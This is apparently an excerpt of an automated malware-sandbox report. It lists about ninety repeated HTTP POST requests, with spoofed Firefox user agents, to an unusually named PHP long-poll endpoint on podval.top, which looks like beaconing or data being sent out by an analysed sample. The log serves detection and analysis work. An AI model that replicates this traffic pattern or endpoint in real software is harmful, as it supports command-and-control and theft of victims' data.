                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1756Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 500Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 384Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1080Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1756Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1780Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1736Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1780Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1780Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1772Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1048Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1780Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1780Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
